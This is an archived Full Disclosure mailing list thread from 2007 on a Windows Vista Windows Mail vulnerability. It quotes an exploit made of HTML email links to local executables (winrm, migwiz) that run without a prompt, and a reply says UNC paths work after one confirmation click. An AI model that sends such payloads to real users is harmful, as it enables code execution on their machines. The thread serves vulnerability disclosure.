Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

Re: Microsoft Windows Vista - Windows Mail Client Side Code Execution Vulnerability

From: "Kingcope" <kingcope () gmx net>
Date: Fri, 23 Mar 2007 11:32:07 +0100
Hello,

I just tested it with UNC paths,
and yes this works too, but you have to
press on the yes button when it asks because
the file is not authorized (it comes from remote).
After pressing Yes one time it gets executed.
Normally Windows Mail does not execute
exe or other executable files, now it does :-)


Thank you for this nice idea Joxean Koret.



Regards,

kcope

----- Original Message ----- 
From: "Joxean Koret" <joxeankoret () yahoo es>
To: <full-disclosure () lists grok org uk>; <kingcope () gmx net>
Sent: Friday, March 23, 2007 11:15 AM
Subject: RE: [Full-disclosure] Microsoft Windows Vista - Windows Mail Client 
Side Code Execution Vulnerability



Hi,

Did you test it using UNC paths? It may be a way to
truly execute arbitrary code.

Regards,
Joxean Koret


Exploit:
Send a HTML email message containing the URL:
<a href="c:/windows/system32/winrm?">Click here!</a>
or
<a href="c:/windows/system32/migwiz?">Click here!</a>
and winrm.cmd/migwiz.exe gets executed without asking



for permission.
These are just examples.

I could not pass arguments to winrm (hehe this would
be beautiful), but I guess there
are several attack vectors.




______________________________________________
LLama Gratis a cualquier PC del Mundo.
Llamadas a fijos y móviles desde 1 céntimo por minuto.
http://es.voice.yahoo.com 


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Previous By Date Next
Previous By Thread Next

Current thread: